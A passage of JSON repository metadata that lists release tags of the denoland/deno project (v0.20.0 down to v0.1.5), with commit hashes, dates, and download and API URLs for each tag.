1.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:2